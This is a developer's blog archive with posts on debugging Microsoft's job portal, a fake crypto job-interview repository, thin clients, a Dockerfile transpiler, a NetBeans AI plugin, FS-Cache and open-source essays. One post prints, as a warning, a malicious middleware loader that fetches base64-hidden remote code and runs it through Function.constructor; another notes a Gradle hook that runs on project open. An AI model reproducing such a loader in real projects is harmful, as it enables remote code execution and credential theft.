Monday, October 27, 2025

Debugging Microsoft's Job Portal

Or: When applying for a job becomes a technical interview you didn't sign up for

TL;DR: Microsoft's job portal had a bug that prevented me from submitting my application. After some browser console detective work, I discovered missing bearer tokens, set strategic JavaScript breakpoints, and manually set authentication headers to get my resume through. The irony of debugging Microsoft's code to apply to Microsoft was not lost on me.

I was excited to apply for a position at Microsoft. Their job portal has a nice feature: you can import your resume directly from LinkedIn rather than uploading a PDF. Convenient, right? I clicked the import button, watched my information populate, and confidently hit "Upload."

And waited. And waited.

Nothing happened. The button was stuck in a loading state, spinning endlessly.

As any developer would do when faced with a broken web app, I opened the browser's Network tab. There it was: a request to gcsservices.careers.microsoft.com that was failing. I examined the request headers and immediately spotted the problem: Authorization: Bearer undefined

Ah yes, the classic "undefined" bearer token. Someone's authentication flow was broken. The frontend was trying to make an authenticated request, but the token wasn't being set properly.

I started looking through other requests in the Network tab and found several that did have valid bearer tokens. I copied one of these working tokens for later use. Now I needed to figure out where in the code this broken request was being made.

I searched through the loaded JavaScript files and found the culprit in a minified file called main.0805accee680294efbb3.js. The code looked like this:

e && e.headers && (e.headers.Authorization = "Bearer " + await (0,
r.gf)(),
e.headers["X-CorrelationId"] = i.$.telemetry.sessionId,
e.headers["X-SubCorrelationId"] = (0,
s.A)(),
t(e))

This is where the bearer token was supposed to be added to the request headers. The r.gf function was clearly supposed to retrieve the token, but it was returning undefined.

I set a breakpoint on this line using Chrome DevTools. When the breakpoint hit, I manually set the bearer token in the console:

e.headers.Authorization = "Bearer " + "[my-valid-token]"

Then I let the execution continue. Success! The resume uploaded. Victory, right? Not quite.

After uploading the resume, I tried to click "Save and continue" to move to the next step. More failed requests.

Back to the Network tab. This time, I noticed requests failing to a different domain: careers.microsoft.com (without the "gcsservices" subdomain). These requests also had bearer token issues, but here's the twist: they needed a different bearer token than the first set of requests. Microsoft's job portal was apparently using two separate authentication systems.

I searched through the JavaScript again and found where XMLHttpRequest headers were being set:

const o = Ee.from(r.headers).normalize();

This was in a different part of the codebase handling a different set of API calls. I set another breakpoint here. Now I had a two-token juggling act: when requests went to gcsservices.careers.microsoft.com, I set Token A, and when requests went to careers.microsoft.com, I set Token B.

With both breakpoints set and both tokens ready, I went through the application flow one more time, manually adding the appropriate token at each breakpoint. It finally worked. I made it through to the next page.
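The juggling rule is simple enough to write down. This is only a sketch of what I was doing by hand: `tokenForUrl` and `authHeaderFor` are hypothetical helpers of my own, not anything from Microsoft's code, and `TOKEN_A` / `TOKEN_B` stand in for the values copied from the Network tab.

```javascript
// Hypothetical lookup table: one bearer token per API host.
// TOKEN_A / TOKEN_B are placeholders for tokens copied from working requests.
const TOKENS = {
  "gcsservices.careers.microsoft.com": "TOKEN_A",
  "careers.microsoft.com": "TOKEN_B",
};

// Pick the token that matches the host of the request URL.
function tokenForUrl(url) {
  const host = new URL(url).hostname;
  // Own-property check, so an unknown host never matches an inherited key.
  return Object.prototype.hasOwnProperty.call(TOKENS, host)
    ? TOKENS[host]
    : undefined;
}

// Build the Authorization header value, refusing to produce
// the "Bearer undefined" header that started all this.
function authHeaderFor(url) {
  const token = tokenForUrl(url);
  if (!token) throw new Error(`No token known for ${url}`);
  return `Bearer ${token}`;
}
```

Pasted into the console, something like this would save retyping the token at each breakpoint, assuming the paused scope exposes the request URL (I have not checked that it does in either code path).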


There's something deliciously ironic about having to debug Microsoft's production code just to submit a job application to Microsoft. Oh, and did I mention? I was doing all of this on a Chromebook Flex. 😄

This reminded me of last year when I wanted to buy a book from an online store. Their checkout form was broken and wouldn't let me proceed to payment. So I opened the browser console, found the validation bug in their JavaScript, bypassed it, and successfully placed my order. Apparently, fixing broken web forms has become my unexpected superpower.

To the Microsoft Hiring Team

If you're reading this:

  • Can I haz job?

Did I need to spend an hour debugging a job application portal? No. Was it more interesting than just uploading a PDF? Absolutely. And hey, if nothing else, I got a good blog post out of it.

Have you ever had to debug something just to accomplish a simple task? Share your stories in the comments!

Friday, October 17, 2025

Almost exploited via a job interview assignment

A few days ago someone reached out on LinkedIn claiming to represent Koinos Finance's hiring team. Christian Muaña said they were impressed with my background and wanted me to move forward for a Senior Software Engineer position.

The technical interview email came from "Andrew Watson, Senior Engineering Engineer at Koinos" (hire @ koinos .finance) and seemed professional enough. Complete a 45-minute take-home coding assessment, push results to a public repository, share the link. Two business days. Standard tech interview stuff.

BitBucket and VMs

Andrew sent a BitBucket link to what looked like a typical full-stack React project. Frontend, backend with Express, routing, the usual. Nothing immediately suspicious.

I clicked the BitBucket link; probably not great opsec, but I do use BitBucket. Instead of cloning to my local machine though, I spun up a Google Cloud VM. Call it paranoia or good practice, but something made me want to keep this at arm's length (well, it is something crypto related).

Good thing too. I found the malicious code by manually reviewing the files. Never even ran npm install or built the project.

Middleware secrets

Buried in the backend middleware, specifically the cookie handling code, I found something concerning.

The code fetched data from a remote URL (base64 encoded) via mocki .io, then passed the response to what looked like an innocent "error handler" function. But this wasn't error handling: it used JavaScript's Function.constructor to execute whatever code the remote server returned.

const errorHandler = (error) => {
    const createHandler = (errCode) => {
        const handler = new (Function.constructor)('require', errCode);
        return handler;
    };
    const handlerFunc = createHandler(error);
    handlerFunc(require);
}

axios.get(atob(COOKIE_URL)).then(
    res => errorHandler(res.data.cookie)
);

The moment I started the backend server, it would have downloaded and executed arbitrary code from an attacker-controlled server. That puts environment variables, API keys, credentials, and sensitive files within reach, and leaves room to install backdoors.

A win for manual code review.

What made it work

The sophistication is what gets me. This wasn't some obvious phishing email with broken English. Professional LinkedIn outreach. Realistic assignment structure. Hosted on BitBucket, a trusted platform. Actual working React code with malicious payload hidden in middleware.

The malicious code used innocent function names like errorHandler and getCookie, tucked away in middleware where most developers wouldn't scrutinize carefully. Who thoroughly audits every line of a take-home assignment before running it?

It's targeted at developers who regularly download and run unfamiliar code as part of their job. That's the genius of it.

The obvious signs

Looking back, the red flags were there:

  • Salary range mentioned immediately.
  • Extreme flexibility: part-time acceptable, even with a current job.
  • "Senior Engineering Engineer" is redundant.
  • Two business days for a 45-minute assessment creates artificial urgency.

But the real red flag was in the code: base64-encoded URLs, remote code execution patterns, obfuscated logic in what should be straightforward middleware.
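Those code-level red flags can be turned into a rough first-pass check. The sketch below is my own illustration: `findSuspiciousLines` is a hypothetical helper and the pattern list is an assumption, nowhere near a complete detector. It flags lines worth reading closely and does not replace reading them.

```javascript
// Heuristic patterns only. This list is an illustrative assumption,
// not a complete or reliable malware detector.
const SUSPICIOUS_PATTERNS = [
  { name: "Function constructor", regex: /\bFunction\s*\.\s*constructor\b|\bnew\s+\(?\s*Function\b/ },
  { name: "eval call", regex: /\beval\s*\(/ },
  { name: "base64 decoding", regex: /\batob\s*\(|Buffer\.from\s*\([^)]*,\s*['"]base64['"]\s*\)/ },
  { name: "child process access", regex: /require\s*\(\s*['"](node:)?child_process['"]\s*\)/ },
];

// Return one finding per (line, pattern) match, with 1-based line numbers.
function findSuspiciousLines(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((line, index) => {
    for (const { name, regex } of SUSPICIOUS_PATTERNS) {
      if (regex.test(line)) {
        findings.push({ line: index + 1, name, text: line.trim() });
      }
    }
  });
  return findings;
}
```

Run against the middleware shown earlier, this would flag both the `Function.constructor` line and the `atob(COOKIE_URL)` line. A determined attacker can dodge every one of these patterns, so a clean result means nothing on its own.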

What this means

This is part of a growing trend of supply chain attacks targeting developers. We're attractive targets because we routinely download and execute code, have access to sensitive systems, and work with valuable intellectual property.

The sophistication is increasing. Not just phishing emails anymore; fully functional applications with malicious code carefully hidden where it might go unnoticed. Hosted on legitimate platforms like BitBucket for added credibility.

The thing is, the better these attacks get, the more they exploit the fundamental nature of development work. We clone repositories. We run npm install. We execute code. That's the job.

So what do you do? Review code before running it. Use isolated environments: VMs, Docker containers, cloud instances. Use Chromebooks for work! Watch for obfuscation. Be suspicious of too-good-to-be-true offers. Trust your instincts.

That nagging feeling that made me use a VM instead of my local machine was spot-on.

Your security is worth more than any job opportunity.

Thursday, October 09, 2025

The Modern Thin Client

For years, the developer community has been locked in a quiet arms race over who has the most powerful laptop. I’ve stepped off that treadmill. My setup is a modern take on the thin client, and it has made my workflow more focused, secure, and flexible.

At its heart, the principle is simple: use a lean local machine that runs only a browser, a terminal, and Visual Studio Code. The core of the work happens on a more powerful computer, which is often just another machine in my home office, accessible over the local network. I use the terminal to SSH into it, and VS Code's Remote Development to edit files directly on that remote machine. The local device becomes a high-fidelity window into a more powerful computer, and since it all runs over the intranet, my work continues uninterrupted even if the internet goes down.

This philosophy is portable. I have a Chromebook that I leave at my in-laws', perfectly set up for this. At home, my primary machine is an older MacBook Pro that runs only Chrome, Terminal, and VSCode. Both devices are just different gateways to the same powerful remote workspace.

This approach has the soul of an old-school UNIX workstation but with a modern editor. The terminal is the control center, but instead of a monochrome vi session, you get the full VSCode experience with all its extensions, running seamlessly on remote files.

A major benefit is the built-in security isolation. In a traditional setup, every script and dependency runs on the same machine as your primary browser with all its logged-in sessions. Here, there's a clear boundary: the local machine is for "trusted" tasks like browsing, while the remote machine is for "untrusted" work. A malicious script on the server cannot touch local browser data.

The most significant power, however, is the ability to scale. I've had situations where I needed parallel builds of separate branches for a resource-heavy project. A single machine couldn't handle two instances at once. With this setup, it was trivial: one VSCode window was connected to a powerful machine running the develop branch, and a second VSCode window was connected to an entirely different server running the feature branch. Each had its own dedicated resources, something impossible with a single laptop.

This model redefines the role of your laptop. It’s not about having a less capable machine, but about building a more capable and resilient system. The power is on the servers, and the local device is just a perfect, secure window into it.

Monday, October 06, 2025

Building a Dockerfile Transpiler

I'm excited to share dxform, a side project I've been working on while searching for my next role: a Dockerfile transpiler that can transform containers between different base systems and generate FreeBSD jail configurations.

The concept started simple: what if Dockerfiles could serve as a universal format for defining not just Docker containers, but other containerization systems too? Specifically, I wanted to see if I could use Dockerfiles—which developers already know and love—as the input format for FreeBSD jails.

I have some background building transpilers from a previous job, so I knew the general shape of the problem. But honestly, I expected this to be a much larger undertaking. Two things made it surprisingly manageable:

Dockerfiles are small. Unlike general-purpose programming languages, Dockerfiles have a limited instruction set (FROM, RUN, COPY, ENV, etc.). This meant the core transpiler could stay focused and relatively compact.

AI-assisted development works (mostly). This project became an experiment in how much I could orchestrate AI versus writing code myself. I've been using AI tools so heavily I'm hitting weekly limits. The feedback has been fascinating: AI is surprisingly good at some tasks but still needs human architectural decisions. It's an odd mix where it gets things right and wrong in unexpected places.

Here's where complexity crept in: the biggest challenge wasn't the Dockerfile instructions themselves—it was parsing the shell commands inside RUN instructions.

When you write:

RUN apt-get update && apt-get install -y curl build-essential

The transpiler needs to understand that apt-get install command deeply enough to transform it to:

RUN apk update && apk add curl build-base

This meant building a shell command parser on top of the Dockerfile parser. I used mvdan.cc/sh for this, and it works beautifully for the subset of shell commands that appear in Dockerfiles.
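To make the transformation concrete, here is a deliberately crude sketch of the idea. It is not how dxform works: dxform parses the shell properly with mvdan.cc/sh, while this version just splits strings. The function names are hypothetical, and the mapping table holds only the two packages from the example above.

```javascript
// Tiny illustrative mapping; only the entries from the example above.
const APT_TO_APK = new Map([
  ["curl", "curl"],
  ["build-essential", "build-base"],
]);

// Translate a single apt-get command into its apk equivalent.
// Anything that is not a recognised apt-get command is returned unchanged.
function translateAptCommand(command) {
  const words = command.trim().split(/\s+/);
  if (words[0] !== "apt-get") return command.trim();
  if (words[1] === "update") return "apk update";
  if (words[1] === "install") {
    // Drop flags such as -y; apk add does not prompt.
    const packages = words.slice(2).filter((w) => !w.startsWith("-"));
    // Unknown packages pass through unchanged so they are easy to spot.
    return ["apk", "add", ...packages.map((p) => APT_TO_APK.get(p) ?? p)].join(" ");
  }
  return command.trim();
}

// Translate a whole RUN line by handling each &&-separated command.
function translateRun(line) {
  const body = line.replace(/^RUN\s+/, "");
  return "RUN " + body.split("&&").map(translateAptCommand).join(" && ");
}
```

Splitting on `&&` breaks as soon as a command contains a quoted string, a subshell, or a line continuation, which is exactly why a real shell parser is needed.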

dxform can currently transform between base systems (convert Debian/Ubuntu containers to Alpine and vice versa), translate package managers (automatically mapping ~70 common packages between apt and apk), and preserve your comments and structure.

The most interesting part is the FreeBSD target. The tool has two outputs: --target freebsd-build creates a shell script that sets up ZFS datasets and runs the build commands, while --target freebsd-jail emits the jail configuration itself. Together, these let you take a standard Dockerfile and deploy it to FreeBSD's native containerization system.

dxform transform --target freebsd-build Dockerfile > build.sh

dxform transform --target freebsd-jail Dockerfile > jail.conf

It's early days, but the potential is there: Dockerfiles as a universal container definition format, deployable to Docker or FreeBSD jails.

This is very much an experiment and a learning experience. The package mappings could be more comprehensive, the FreeBSD emitter could be more sophisticated, and there are surely edge cases I haven't encountered yet. But it works, and it demonstrates something compelling: with the right abstractions, we can build bridges between different containerization ecosystems.

The project is open source and ready for experimentation. Whether you're interested in cross-platform containers, FreeBSD jails, or the mechanics of building transpilers for domain-specific languages, I'd love to hear your thoughts.

Check out the project on GitHub to see the full source and try it yourself.

Monday, September 29, 2025

Building a Claude Code Plugin for NetBeans: An Early Look

I've started working on a personal project to integrate Claude Code directly into the NetBeans IDE. It's still in the early stages, but there's enough progress to share a look at how it's taking shape.

As someone who contributed to NetBeans in the past (starting with the Sun Microsystems days, up to the early Apache Software Foundation years and with my old OpenBeans distribution), it's interesting to be tinkering with the platform again in this new context of AI-assisted development.

Current Progress

The basic integration is working. The plugin can now:

  • Respond to most tool calls
  • Track and send your current code selection, updating Claude when you change it

This provides the foundation for contextual conversations about your code. Most of the core MCP (Model Context Protocol) tools are implemented, allowing Claude to interact meaningfully with the project workspace.

Interestingly, I'm building much of this with Claude Code itself. While I handle the architecture and inevitably fix things when they go off track, it's been a practical test of using the tool to build its own integration.

Current Focus: Refining the Integration

Right now, I'm focused on the finer details of the MCP implementation. The public documentation covers the concepts well, but getting all the JSON schemas precisely right for a robust integration requires some careful attention.

What makes this particularly interesting is that unlike many modern protocols, Claude Code's MCP flavour isn't fully open—and neither are the official plugins for editors like VSCode and IntelliJ.

To help with development, I created a WebSocket proxy library—ironically, with Claude's help—which has been useful for observing the data flow and debugging the communication layer.

Looking Ahead

This remains a side project, driven by personal interest in both NetBeans and AI tooling. The goal for now is to create a solid, functional plugin that I'd be comfortable using.

If you're a NetBeans user curious about AI-assisted coding, I'd be interested in your thoughts. What would make a tool like this most useful in your workflow? I'm continuing development and will share updates as there's more to show.

If you're curious about the code or want to follow along, the project is on GitHub.

Friday, September 26, 2025

Scaling AI Workloads: Using Linux FS-Cache to Serve Giant Models from Network Storage

Working with multi-gigabyte LLM and diffusion model files presents a practical challenge: local storage is fast but limited, while network storage is capacious but slow. This is especially true for compact workstations like a Mac Mini or a laptop with a small SSD, where fitting several large models is impossible.

What if you could get the best of both worlds—the speed of local storage for active models and the limitless capacity of a network share? Instead of copying files back and forth, we can use a transparent caching layer built right into the Linux kernel.

The Bottleneck: Network Latency vs. Model Size

The standard approach of mounting a network drive (NFS or Samba/CIFS) containing your model repository solves the storage problem but introduces a performance penalty. Loading a 10GB model over a network, even a fast one, can cause significant delays. This slows down experimentation, hinders rapid model switching, and creates a frustrating development cycle.

The solution isn't to fight the network but to smartly use local storage as a massive read-cache for the remote filesystem. Enter FS-Cache.

FS-Cache: The Hidden Gem for Accelerating Network Filesystems

Linux has long included a powerful, filesystem-agnostic caching layer called FS-Cache. Originally designed for environments like NFS, its utility for AI workloads is profound. The concept is simple:

  1. The first time a model file is read from the network, it is silently stored in a designated cache on a local disk (ideally an SSD).
  2. Every subsequent read for that file is served directly from the local cache at drive speeds, bypassing the network entirely.

This means the second time you load "llama2-7b.Q4.gguf," it feels instantaneous.

Implementation: A Two-Step Setup

The beauty of this system is that it requires no changes to your applications. PyTorch, TensorFlow, or any other tool that reads files will transparently benefit.

Step 1: Configure the cachefilesd Daemon

The kernel provides the caching engine, but you need a userspace manager for the cache directory. This is handled by cachefilesd.

  1. Install it: sudo apt install cachefilesd (on Debian/Ubuntu).
  2. Edit /etc/cachefilesd.conf to point dir to a directory on your fast local drive (e.g., dir /var/cache/fscache). Ensure it has enough space for your active set of models.
  3. Start and enable the daemon: sudo systemctl enable --now cachefilesd.
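For reference, a cachefilesd.conf along these lines should work. The dir value is the one from step 2. The tag and the culling thresholds are what I believe the Debian package ships by default, so treat them as an assumption and check the cachefilesd.conf(5) man page on your system.

```
# Where cached file data lives; put this on the fast local disk.
dir /var/cache/fscache
tag mycache

# Free-space thresholds on that disk (percent of blocks):
# above brun culling is off, below bcull culling starts,
# below bstop nothing new is cached until space is freed.
brun 10%
bcull 7%
bstop 3%

# The same thresholds, applied to free file slots (inodes).
frun 10%
fcull 7%
fstop 3%
```

On a disk that also holds other data, raising these percentages keeps the cache from squeezing everything else.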

Step 2: Mount the Network Share with the fsc Flag

Now, mount your network share containing the models with the special fsc (filesystem cache) option.

For a CIFS/Samba share:

sudo mount -t cifs //ai-server/models /mnt/models -o username=user,password=pass,fsc

For an NFS share:

sudo mount -t nfs ai-server:/models /mnt/models -o fsc

That's it. Any file read from /mnt/models is now eligible for caching.

Pro Tip: Pre-Warming the Cache for Instant Results

While the cache populates naturally during use, you can pre-load specific models to eliminate the first-load penalty entirely. This is perfect for preparing a model before a demo or a critical training run.

Simply read the file through the mount point:

cat /mnt/models/llama2-7b.Q4.gguf > /dev/null

This command will pull the entire model file through the kernel's FS-Cache layer, populating the local disk cache. The next time your Python script opens that file, it will be read from the local SSD at full speed.
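The same trick can be scripted when you want to warm several models and see how much was read. A minimal Node.js sketch, assuming the share is mounted with fsc as above; `prewarm` is a hypothetical helper that does what `cat file > /dev/null` does.

```javascript
const fs = require("fs");

// Read a file start to finish and discard the bytes,
// like `cat file > /dev/null`. Returns the number of bytes read.
function prewarm(path, chunkSize = 1 << 20) {
  const fd = fs.openSync(path, "r");
  const buffer = Buffer.alloc(chunkSize);
  let total = 0;
  try {
    let bytesRead;
    // position = null means "continue from the current file offset".
    while ((bytesRead = fs.readSync(fd, buffer, 0, chunkSize, null)) > 0) {
      total += bytesRead;
    }
  } finally {
    fs.closeSync(fd);
  }
  return total;
}
```

Calling `prewarm` on each model path in a loop and printing the returned byte counts gives a quick sanity check that every file was read in full.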

Conclusion

Using FS-Cache transforms your workflow. It allows a small, fast local disk to act as a high-speed front-end to a vast, centralized model repository on a network server. This setup is not just for media files; it's a pragmatic and powerful solution for managing the growing size of AI artifacts, making it easier to scale your development environment without upgrading every machine's storage.

Tuesday, June 14, 2022

The Trouble with Harry time loop

I saw The Trouble with Harry (1955) a while back and it didn't make a big impression on me. But recently I rewatched it and was amazed at how oddly time seems to flow and how confused people seem, as if they have memory problems.

This review goes into detail about the movie, but I wanted to focus on a single riddle in the movie. It's this exchange with the kid:

Arnie: Why haven't you visited before?
Sam: Perhaps I'll come back tomorrow
Arnie: When's that?
Sam: Day after today.
Arnie: That's yesterday, today is tomorrow.
Sam: It was.
Arnie: When was tomorrow yesterday, Mr. Marlowe?
Sam: Today.
Arnie: Oh, sure. Yesterday.

Arnie seems to be the only one that remembers reliving days. Every adult just has slight confusion at times; forgetting things or having unexplained familiarity with each other.

We learn from this exchange the loop is not identical (Sam never visited before). But time does not flow properly since Arnie has learned not to expect that tomorrow will just come the next day ("When's that?").

Actually, Arnie knows that the day after the present day is... "yesterday"; the loop restarts. If anything it looks like the present day is something entirely new to Arnie. It's finally a "tomorrow".

My impression is that the loop had a single day until now. It was "yesterday" on a loop. The present day is finally a "tomorrow".

Sam and Arnie obviously talk about things from different perspectives. Maybe Sam has a slight intuition about things (being an artist) but only Arnie knows about the loop. So, it's not clear what Sam means when he says "It was".

Anyway, this puzzles Arnie, who asks "When was tomorrow yesterday, Mr. Marlowe?"

Now, Sam answers "Today". This may just be related to the talk they had: Arnie mentioned that the day after today is yesterday so, today is the day when yesterday will come tomorrow.

But then Arnie thinks about the question he just asked and finds his own answer: in the previous loop of yesterday tomorrow was always yesterday.

It almost looks like the timeline was: Yesterday 1, Yesterday 2, ..., Yesterday N, Today (brand new).

Based on the ending we know the adults intentionally set up a time loop: they leave Harry in the forest for Arnie to find again. The mother even says: "Go on, Arnie, run home and tell me about it" and Miss Ivy Gravely repeats "Please Arnie, run home and tell your mother".

So, the timeline is: Yesterday 1, Yesterday 2, ..., Yesterday N, Today 1, Today 2 (new loop).

It does not look to me that time is going in reverse. It looks to me like there's a daily loop that doesn't progress until things are settled.

Going back to the missing piece: Sam says "it was" suggesting today was tomorrow. Assuming this is the 1st day in the new loop, it does make sense indeed: today was yesterday's tomorrow, but since they are entering another loop there will not be another new day, just today on repeat.

The riddle is interesting because there's no language to express time loops properly. "Tomorrow" may mean the day following the present day, which may be a re-run or loop, or "tomorrow" may be the day naturally following current events. A more proper (but dry) phrasing would be:

Arnie: Why haven't you visited in any of the (repeated) days I remember?
Sam: Perhaps I'll come back tomorrow.
Arnie: When will we get to live tomorrow?
Sam: Day after today.
Arnie: After today we will relive yesterday, today is a new day following the yesterday loop.
Sam: But the next day won't be new.
Arnie: When did we live the day before yesterday, Mr. Marlowe?
Sam: [Nonsensical response.]
Arnie: [Gets confused.] Oh, sure. We continuously relived yesterday.

Monday, August 03, 2020

Saturday, July 04, 2020

The Geek and the pseudo inclusive peer pressure

Discrimination based on social skills and social groups exists and geeks experience it a lot.

One facet of it is the pseudo inclusive peer pressure.

The desire to belong to a group is strong in anyone so people would accept many things just to fit in.

At the same time, a few understand this game quite well, can get meta about it and specifically target geeks to mock them by appearing to be inclusive.

Nothing causes more pleasure to such dark 'master minds' than tricking a geek into ridiculing themselves!

Not only for the ridicule but for the mere fact that the geek believed they would thus become part of the in-group: this was never on the table! They will never be part of the in-group!

After a few such experiences some geeks develop a good sense for this situation.

It is no surprise then that some react quite harshly in the grown up world. Their senses are screaming: it's a trap!

But the master minds are also grown ups now, and they want small things, all in the name of being inclusive.


Tuesday, June 30, 2020

Open Source sustainability is not about the individual

There was a lot of buzz a while back about Open Source sustainability. Small and large companies as well as individuals discovered it's near impossible to survive financially doing Open Source.

It occurred to me that this might be an emergent property of Open Source and a reason why many foundations (like Apache) as well as users intuitively look at the "community" first.

The community is like a swarm, a Redundant Array of Individual Contributors (RAIC) that carries on regardless of whether a particular individual drops out. So, a "good" Open Source project is one where the community has achieved this chain reaction, while the others are at a stage where individual contributors make or break the project.

This conclusion is quite ruthless about a specific company or individual though: the better your Open Source project is, the more precarious your position.

The role of BDFL (Benevolent dictator for life) might be the only one guaranteeing some stability for an individual, but this means the swarm can only sustain one queen (I mean, dictator). Conceptually this role might be required to provide some coherence to the swarm.

Thursday, June 04, 2020

Instant Thought: another open source supply chain attack

It seems not a day goes by without another open source supply chain attack.

The latest, uncovered by the security researcher "JK", is called "Instant Thought" and was noticed in the most popular Java IDE, combined with the very popular build system Gradle.

One might assume that just opening a Gradle project to read the source code is a safe operation, but Instant Thought shows this is not the case.

Gradle projects might have an unassuming settings.gradle file with a tiny block which gets executed by the IDE as soon as the project is loaded.

Root cause analysis showed the problem is the gradle.projectsLoaded hook which is able to run code with the full permissions of the user account:

gradle.projectsLoaded { g ->
  // do bad things
}

"This is not unlike the Word macro viruses seen in late '90s" said another analyst. "Which just shows how behind the times the IDEs are with security".

It is not clear how widespread Instant Thought is but suffice to say developers have to think long and hard before executing or even opening unknown projects.

According to the vendor, this is a low priority issue: "[Our IDE] automatically configures the project during the import (which is quite similar to executing gradle command) and it causes the code execution. The current behaviour seems not to be a high severity security problem thus it won't be fixed in the near future."

Thursday, January 23, 2020

Roam Like at Home is a regression for Romania

On June 15th 2017 the EU launched "Roam Like at Home", a set of rules that removed roaming charges. It was a great idea to harmonise telecom infrastructure and remove another invisible border separating people within the EU.

Romania was hit particularly badly by these rules. They introduced new borders where before there were none.

Previously, roaming was available to any telecom user either on a subscription plan or on a pre-paid card in Romania. The only limitation was that, rarely, the operator might ask for a deposit (say, 100 euro) so you don't rack up too many fees while abroad.

Internet and mobile services are particularly cheap and fast in Romania. We used to be ranked 5th worldwide on internet speed alone.

With prices this low, Romanian telecom operators worried about abuse: Romanians going abroad and downloading too much, or other EU residents buying Romanian SIM cards to use instead of their expensive national ones.

In order to contain this potential problem the EU was flexible with the "Roam Like at Home" rules and allowed a "fair use policy".

But the biggest blow was that the EU allowed contracts without roaming services. Guess what all Romanian telecom operators started rolling out immediately? They removed roaming from all the subscription plans under a price they considered acceptable!

A reasonable, entry-level, subscription plan that would have had roaming before 2017 suddenly became useless when crossing the border.

Note that without roaming nothing works! You have no data, and no calls or SMS either. You are stranded with a non-functioning telephone in another EU country. This was an "interesting" experience for Romanian tourists in early 2018. All they could call was 112.

Getting roaming temporarily on a subscription plan is just not possible anymore. Either you upgrade the whole plan to a more expensive one, forever, or you have no phone abroad.

A pre-paid card has more advantages. You can activate a more expensive roaming plan at any time, but you are still penalised by losing all the benefits you had until then, regardless of how much the 'national' plan cost or how much of it you used.

In conclusion Roam like at Home reduced the quality of the telecom offer in Romania and introduced a quite visible border separating Romanians from the rest of the EU. One cannot imagine under what scenario the concept of 'roaming services' for SIM cards sold within the EU to EU citizens should even exist.

Another change that this measure did introduce in Romania is a bigger churn on SIM cards and operators. If Romanians manage to separate their identity from the SIM number and the operator is just a dumb carrier then it will not have been all for nothing.

Friday, August 16, 2019

Wayback Machine Downloader

Internet Archive's Wayback Machine is a gift to the world. For quick checks you just enter the URL and you get the archived version going years back.

A whole little cottage industry seems to have been formed around the Wayback Machine. They offer you whole-site download and conversions for the low price of $5 or $15 or $45 or however much they can convince you their service is worth.

Among these busy bees, the free Ruby-based Wayback Machine Downloader is a little gem.

You just install it then run

wayback_machine_downloader -c 10 -s http://www.example.com

and you get everything! Total cost: $0.

Installing the actual gem on macOS as a non-admin user is a topic with contradictory info online. There's a `gem install --local` command but it doesn't seem to do what one expects, namely install into the home folder of the current user.

What did the trick for me was:

gem install -i ~/.gem/ruby/2.3.0/ wayback_machine_downloader

and this was after I manually downloaded the proper .gem file from rubygems.org.

Some even recommended adding an http (versus the default https) source to gem, but that seemed foolish, and even gem itself complained about using http in 2019.

Whatever road you pick with downloading from Wayback Machine, remember all the work the Internet Archive is doing for all this to be available to you and donate to them.

Saturday, June 08, 2019

Fair Source and the Fair Source Initiative

There's been some uproar about the MongoDB Server Side Public License, which tries to prevent cloud vendors like Amazon from taking all the money in the MongoDB market.

Many are pointing out that this new license does not respect the Open Source Definition published by the Open Source Initiative.

In truth, many users and companies would find the license acceptable. A legal advisor will clear the license, the software will be used and nobody except a vendor in a position similar to Amazon's will care.

What this move towards a financially sustainable open source ecosystem needs is branding.

I suggest calling this new type of open source "fair source". Most people and companies understand that some money is necessary to keep a project alive and would find it palatable that once you are big enough to disrupt the market for the author, you should pay.

In order to help smaller companies that do not have a legal advisor at hand, a Fair Source Initiative foundation should be created. This foundation would review such fair source licenses and define them as acceptable or not.

Much as "open source" was introduced to make free software more acceptable to businesses, "fair source" will be about making an open source business model more sustainable.

Open Source was about dethroning the Free Software Foundation. Fair Source must dethrone the Open Source Initiative.

Perhaps the Open Source Initiative board will realize this and redefine the way they classify licenses. Otherwise they will find themselves irrelevant for a buzzing section of the software world.

Saturday, April 27, 2019

Apache NetBeans interview

As Apache NetBeans became a top level Apache project and finished the incubation process I was asked for an interview and my photo.

Only a single quote was taken from the interview and used in a not too positive article about NetBeans. The quote was presented as coming from me as a member of the 'Project Management Committee' to give it even more weight.

Below is my full interview for historical reference:

> Do you think Apache is the best place for NetBeans?

Churchill said that 'democracy is the worst form of Government except for all those other forms that have been tried from time to time'.

In the current context, there is no better place.

Maybe in some alternate universe Sun Microsystems didn't spend a full $1 billion on MySQL but took a chunk of that to create a NetBeans Foundation that rivals the Eclipse Foundation... but I'm not entirely certain it would have been better for the project.
 

> What kind of future do you anticipate for NetBeans under Apache?

This depends on how Apache and the other Apache projects value NetBeans. There is a lot of integration that would help both the projects and the end users.

The ASF is a large Java house now so having a programming language (Groovy), an IDE (NetBeans), build systems (Ant, Maven) and application runtimes (Tomcat, TomEE) means you can do some interesting things in sync.

If you think about it, the IDE is the last major piece of the puzzle missing from Apache. So now, you can push a new feature all the way to developers using the IDE really easily.

Imagine you want to introduce, say, reproducible builds to the Java developer world. Well, you change the build systems, make the runtimes reproducible too, then push this to the default project types in the IDE and suddenly all new Java projects created by developers using the IDE are reproducible. You can change and educate the world really fast.

And education is not to be understated. An IDE suggestion that the developer sees *while editing code* is educational. Want people to use libraries better? A blog post might help, but people have to find it and read it. But if a suggestion about how to use the library better is part of NetBeans, all developers will see it!

It's not clear to me yet if the ASF takes such a holistic approach, but there's a big opportunity here. Everything fits.
 

> What will your project management committee do to advance NetBeans?

This is a hard question for me since I'm not the 'manager' of NetBeans. Nobody is. The whole point under Apache is to participate as individuals, regardless of the employer (that might sometimes be sponsoring said involvement).

So, I don't necessarily see hard targets like under a strictly hierarchical corporation.

Change happens somewhat chaotically but towards betterment. Many people submit specific bug fixes for their particular problems while others work on bigger-picture changes (like supporting a new Java version, etc).

On the Java front we have a lot of community members that work on it, a few of them full time as part of their job at Oracle. On PHP we also have some folks, particularly Jun-ichi Yamamoto from Japan. JavaEE is also quite popular. We had people add support for JUnit 5, etc.

Basically the community will self-organize to overcome obstacles. We had somebody fix a really hard bug in the Java profiler. I would have thought that only a handful of core Java developers from Oracle knew how to fix that. But the individual looked into it, worked hard and fixed it! There's a lot of hidden talent like that.
 

> Also, what is the role of the committee?

See https://www.apache.org/foundation/governance/pmcs.html

The PMC decides which new committers get added (who in turn decide how the code is changed) and then votes when a release is to be made as an act of the Apache foundation. We also oversee how the NetBeans trademark is used and basically take care of the NetBeans project and brand as a whole.

> Thank you very much!

No problem. BTW, the individual doing the hard Profiler bugfix I mentioned is called Peter Hull.

Thursday, April 04, 2019

The Apache Software Foundation is a record label not a rock band

